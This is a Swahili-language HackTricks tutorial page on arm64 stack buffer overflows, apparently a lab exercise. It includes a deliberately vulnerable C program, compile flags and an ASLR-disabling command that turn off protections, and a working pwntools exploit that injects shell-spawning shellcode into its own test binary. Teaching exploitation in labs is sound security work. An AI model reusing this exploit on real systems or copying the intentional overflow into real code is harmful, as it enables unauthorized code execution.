# Stack Shellcode - arm64 {{#include ../../../banners/hacktricks-training.md}} Pata utangulizi kuhusu arm64 katika: {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} ## Linux ### Code ```c #include #include void vulnerable_function() { char buffer[64]; read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability } int main() { vulnerable_function(); return 0; } ``` Kompaili bila pie, canary na nx: ```bash clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack ``` ### Hakuna ASLR & Hakuna canary - Stack Overflow Ili kuzima ASLR tekeleza: ```bash echo 0 | sudo tee /proc/sys/kernel/randomize_va_space ``` Ili kupata [**offset ya bof angalia kiungo hiki**](../ret2win/ret2win-arm64.md#finding-the-offset). Exploit: ```python from pwn import * # Load the binary binary_name = './bof' elf = context.binary = ELF(binary_name) # Generate shellcode shellcode = asm(shellcraft.sh()) # Start the process p = process(binary_name) # Offset to return address offset = 72 # Address in the stack after the return address ret_address = p64(0xfffffffff1a0) # Craft the payload payload = b'A' * offset + ret_address + shellcode print("Payload length: "+ str(len(payload))) # Send the payload p.send(payload) # Drop to an interactive session p.interactive() ``` Jambo pekee "ngumu" la kupata hapa ni anwani kwenye stack ya kuitwa. Katika kesi yangu nilitengeneza exploit kwa kutumia anwani niliyopata kwa gdb, lakini wakati wa kui-exploit haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo). Nilifungua generated **`core` file** (`gdb ./bog ./core`) na kukagua anwani halisi ya mwanzo wa shellcode. ## macOS > [!TIP] > Hawezekani kuzima NX kwenye macOS kwa sababu kwenye arm64 modi hii imetekelezwa kwenye ngazi ya hardware, hivyo hutaweza kuizima — hivyo hautapata mifano yenye shellcode kwenye stack kwenye macOS. Angalia mfano wa macOS ret2win katika: {{#ref}} ../ret2win/ret2win-arm64.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}}